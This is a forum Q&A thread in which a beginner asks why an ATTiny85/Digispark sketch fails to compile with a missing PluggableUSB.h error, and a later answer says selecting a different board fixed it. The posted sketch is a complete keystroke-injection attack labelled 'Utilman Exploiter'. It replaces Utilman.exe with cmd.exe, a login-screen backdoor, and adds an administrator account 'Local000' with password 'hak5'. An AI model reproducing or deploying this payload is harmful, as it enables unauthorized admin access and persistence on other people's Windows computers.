# Arduino PluggableUSB

Tags: arduino

I'm new to Arduino, please don't hate me.

My board is an ATTiny85. I have set the programmer to USPasp and "board" to Digispark Default 16.5Mhz. I think this is what's wrong.

I get this error message:

```
In file included from C:\Program Files (x86)\Arduino\libraries\Keyboard\src/Keyboard.h:25:0,

                 from C:\Users\lavaa\AppData\Local\Temp\arduino_modified_sketch_97774\Keyboard.ino:5:

C:\Program Files (x86)\Arduino\libraries\HID\src/HID.h:24:26: fatal error: PluggableUSB.h: No such file or directory

 #include "PluggableUSB.h"

                          ^

compilation terminated.
```

I tried downloading the PluggableUSB lib and putting it into the folder but that didn't work. My board manager URLs are:

```
http://digistump.com/package_digistump_index.json
https://raw.githubusercontent.com/damellis/attiny/ide-1.6.x-boards-manager/package_damellis_attiny_index.json
```

My code is this:

```
/*
 * Generated with <3 by Dckuino.js, an open source project !
 */

#include "Keyboard.h"
#include "PluggableUSB.h"

void typeKey(uint8_t key) {
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup() {
  // Begining the Keyboard stream
  Keyboard.begin();
  // Wait 500ms
  delay(500);
  // Author: Xcellerator
  // Description: Utilman Exploiter to create a new Admin Account
  // The new account will be called "Local000".
  typeKey(KEY_LEFT_GUI);
  delay(50);
  Keyboard.print(F("cmd"));
  typeKey(229);
  Keyboard.print(F("a"));
  typeKey(KEY_RETURN);
  typeKey(KEY_LEFT_ARROW);
  typeKey(KEY_RETURN);
  delay(200);
  Keyboard.print(F("takeown /f \"%systemroot%\\System32\\Utilman.exe\""));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("icacls \"%systemroot%\\System32\\Utilman.exe\" /grant administrators:F /T"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("cd %systemroot%\\System32"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("mkdir util"));
  typeKey(KEY_RETURN);
  Keyboard.print(F("xcopy cmd.exe util\\"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("ren Utilman.exe Utilman.exe.bak"));
  typeKey(KEY_RETURN);
  Keyboard.print(F("cd util"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("ren cmd.exe Utilman.exe"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("cd .."));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("xcopy util/Utilman.exe \\"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("rmdir /s /q util"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("exit"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('u');
  Keyboard.releaseAll();
  Keyboard.print(F("net user Local000 /add"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("net localgroup administrators Local000 /add"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("exit"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();
  Keyboard.print(F("cmd"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("cd \"%systemroot%\\System32\""));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("delete Utilman.exe"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("y"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("ren Utilman.exe.bak Utilman.exe"));
  typeKey(KEY_RETURN);
  delay(50);
  Keyboard.print(F("exit"));
  typeKey(KEY_RETURN);
  typeKey(KEY_LEFT_GUI);
  Keyboard.print(F("cmd"));
  typeKey(229);
  Keyboard.print(F("a"));
  typeKey(KEY_RETURN);
  delay(50);
  typeKey(KEY_LEFT_ARROW);
  typeKey(KEY_RETURN);
  delay(200);
  Keyboard.print(F("net user Local000 *"));
  typeKey(KEY_RETURN);
  Keyboard.print(F("hak5"));
  typeKey(KEY_RETURN);
  Keyboard.print(F("hak5"));
  typeKey(KEY_RETURN);
  Keyboard.print(F("exit"));
  typeKey(KEY_RETURN);
  // Ending stream
  Keyboard.end();
}

/* Unused endless loop */
void loop() {}
```

I have been trying to get this to work for 2 hours or something...

Comment: Maybe this will help... https://www.arduino.cc/en/Guide/Libraries

Answer (score 0, accepted):

Somehow i did it, I just installed ATTiny85 from the boardmanager and it works now, but everyone i asked says i should use Digispark Default. I dont know why or how but it works now, thanks Michaël Roy for that hint. Oh and btw, dda you monster :) .

Comment: Hey, I've been searching for the PluggableUSB library, but couldn't find it. Do you remember where you found it? Thanks.

Comment: @Aaron B can please tell how you solve this issue?